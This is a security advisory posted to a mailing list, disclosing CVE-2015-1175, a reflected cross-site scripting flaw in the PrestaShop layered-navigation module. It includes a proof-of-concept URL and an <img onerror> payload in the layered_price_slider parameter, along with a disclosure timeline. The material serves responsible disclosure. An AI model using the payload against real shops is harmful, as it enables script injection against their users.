CVE-2015-1175-xss-prestashop

From: Sudhanshu Chauhan <sudhanshu@octogence.com>
To: bugtraq@securityfocus.com
Cc:
Subject: CVE-2015-1175-xss-prestashop
Date:


CVE-2015-1175-xss-prestashop

Information
\u20ac\u201d\u20ac\u201d\u20ac\u201d\u20ac\u201d\u20ac\u201d\u20ac\u201d\u20ac\u201c
Advisory by Octogence.
Name: Reflected XSS Vulnerability in prestashop ecommerce software
Affected Software : Prestashop
Affected Versions: 1.6.0.9 and possibly below
Vendor Homepage : https://www.prestashop.com/


Vulnerability Type : Cross-site Scripting
Severity : High
CVE ID: CVE-2015-1175

Impact
\u20ac\u201d\u20ac\u201d
An attacker can craft a URL with malicious JavaScript code which
executes in the browser.

Technical Details
\u20ac\u201d\u20ac\u201d\u20ac\u201d\u20ac\u201d\u20ac\u201d\u20ac\u201c
Sample URL:

http://localhost/prestashop/prestashop/modules/blocklayered/blocklayered-ajax.php?layered_id_feature_20=20_7&id_category_layered=8&layered_price_slider=16_532f363<img%20src%3da%20onerror%3dalert(1)>9c032&orderby=position&orderway=asctrue&_=1420314938300

Parameter:
layered_price_slider

Sample Payload:
<img src=a onerror=alert(1)>

For more information on cross-site scripting vulnerabilities read the
following article:

https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)

Advisory Timeline (mm/dd/yyyy)
\u20ac\u201d\u20ac\u201d\u20ac\u201d\u20ac\u201d\u20ac\u201d\u20ac\u201d\u20ac\u201c
01/07/2015 \u20ac\u201c Reported
01/12/2015 \u20ac\u201c Vulnerability Fixed
01/18/2015 \u20ac\u201c Advisory Released

http://octogence.com/advisories/cve-2015-1175-xss-prestashop/




Regards
Sudhanshu

Octogence Tech Solutions
Noida, India
Mobile  | +91-9971658929
Website| www.octogence.com





Copyright © 1995-2019 LinuxRocket.net. All rights reserved.